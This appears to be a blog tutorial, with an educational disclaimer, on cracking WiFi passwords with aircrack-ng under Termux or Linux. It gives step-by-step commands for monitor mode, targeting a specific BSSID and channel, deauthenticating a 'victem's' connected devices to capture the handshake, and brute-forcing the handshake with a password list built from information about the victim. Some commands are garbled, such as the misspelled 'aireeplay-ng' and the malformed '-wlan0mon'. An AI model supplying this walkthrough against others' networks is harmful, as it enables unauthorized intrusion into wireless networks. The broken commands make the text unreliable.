MASIGNCLEAN101

how to use aircrack-ng in android/termux/linux - for wifi hacking

iklan banner
how to use aircrack-ng in android/termux/linux :

Assalamu-Alaikum friends :

                ****DECLAIMER*****
This article is only for educational purpose,Don't miss use these tutorials use these tricks on your own computer,network,android,devices,for check the vulnerabilities and fix it and always stay legal,if you are used these article in any illegal or malicious activity then i am not responsible so please friends always stay legal.

###########################

aircrack-ng using in Termux/GnuRoot Debian/Android/Linux :-

 download aircrack-ng using, pdf FILE. simply click download pdf 


              
**************************

Follow these Steps :-

    First connect your wife-adapter to your device :

1) Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

      airmon-ng 

    airmon-ng start wlan0



  2) Now start the network detecting by typing this command :

   airodump-ng wlan0mon 



Here you see your target device and stop the detecting by control + z
ctrl + z

3) Now create one folder and name it cap on your desktop or sdcard
and also create a password list to brute force the wifi handshake ,collect the information about victem and create the password list for brute force.

4) copy victem BSSID and also note the target channel CH number
and type this command :

airodump-ng -c 6 --bssid 00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon

-w here you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

5) Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon



now stop attack by control+z and close the terminal

6) now paste the password list in your cap folder and also go into the cap folder directory 

Now crack with this command : 

aircrack-ng -w pass.list 01.cap

7) this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)

Download The PDF file about aircrack-ng simply click on Download pdf 


So friends if you like my information,article ,aircrack-ng using on android using termux app or gnu root debian or linux , make sure to subscribe my youtube channel "TECHNICAL MUJEEB" and follow my this Blog for more information and ethical hacking, Termux tutorials,Android penetration testing and hackers news,videos and article and follow me on twitter,facebook,youtube,Blog,Google+.

Thank you Friends and keep supporting and watching Friends..



Share This :